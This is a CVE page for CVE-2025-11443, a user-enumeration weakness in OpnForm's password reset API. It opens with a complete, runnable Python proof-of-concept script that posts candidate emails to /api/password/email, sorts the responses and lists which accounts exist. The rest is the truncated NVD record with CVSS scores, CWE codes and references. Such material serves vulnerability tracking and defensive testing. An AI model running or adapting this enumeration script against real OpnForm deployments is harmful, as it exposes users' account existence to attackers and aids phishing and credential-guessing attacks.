CVE-2025-11443

#!/usr/bin/env python3 """ CVE-2025-11443 - OpnForm User Enumeration via Password Reset API PoC: Exploits information disclosure in /api/password/email endpoint Reference: Laravel issue #46465 """ import requests import sys import time TARGET_URL = "http://target-opnform-instance.com" RESET_ENDPOINT = "/api/password/email" # Candidate email list for enumeration EMAIL_LIST = [ "[email protected]", "[email protected]", "[email protected]", "[email protected]", "[email protected]" ] def enumerate_users(base_url, emails): """ Enumerate valid user emails by analyzing response differences from the password reset endpoint. """ url = base_url.rstrip("/") + RESET_ENDPOINT valid_emails = [] for email in emails: try: # Send password reset request resp = requests.post( url, json={"email": email}, headers={"Content-Type": "application/json"}, timeout=10 ) status_code = resp.status_code response_body = resp.text print(f"[*] Testing: {email}") print(f" Status: {status_code}") print(f" Response: {response_body[:200]}") # Analyze response to determine if email exists # Registered emails typically return success messages # Unregistered emails return error/different responses if status_code == 200 and ("password reset" in response_body.lower() or "email sent" in response_body.lower() or "reset link" in response_body.lower()): print(f" [+] VALID USER DETECTED: {email}") valid_emails.append(email) elif status_code == 422 or "not found" in response_body.lower(): print(f" [-] Email not registered: {email}") else: # Check for timing differences as well print(f" [?] Ambiguous response for: {email}") time.sleep(0.5) # Rate limiting except requests.exceptions.RequestException as e: print(f"[!] Error testing {email}: {e}") return valid_emails def main(): if len(sys.argv) > 1: target = sys.argv[1] else: target = TARGET_URL print(f"[*] CVE-2025-11443 PoC - User Enumeration") print(f"[*] Target: {target}") print(f"[*] Endpoint: {RESET_ENDPOINT}") print("-" * 60) valid = enumerate_users(target, EMAIL_LIST) print("-" * 60) print(f"[*] Enumeration complete. Found {len(valid)} valid email(s):") for email in valid: print(f" - {email}") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-11443", "sourceIdentifier": "[email protected]", "published": "2025-10-08T08:15:32.697", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in JhumanJ OpnForm up to 1.9.3. This affects an unknown function of the file /api/password/email of the component Forgotten Password Handler. This manipulation causes information exposure through discrepancy. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitability is reported as difficult. The exploit has been made available to the public and could be exploited. This issue is currently aligned with Laravel issue #46465, which is why no mitigation action was taken."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 2.6, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 4.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-203"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jhumanj:opnform:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.9.3", "matchCriteriaId": "C896A041-D9C4-42F0-9477-C57E07D6EFF6"}]}]}], "references": [{"url": "https://docs.google.com/document/d/1GUjJA9vUbsXUngAv6ySsbCIhVynf8_djardLZYEDOe0/edit?tab=t.0#heading=h.my0ldciyllp", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327380", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327380", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.666890", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://docs.google.com/document/d/1GUjJA9vUbsXUngAv6ySsbCIhVynf8_djardLZYEDOe0/edit?tab=t.0#heading=h.my0ldciyllp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "ta ... (truncated)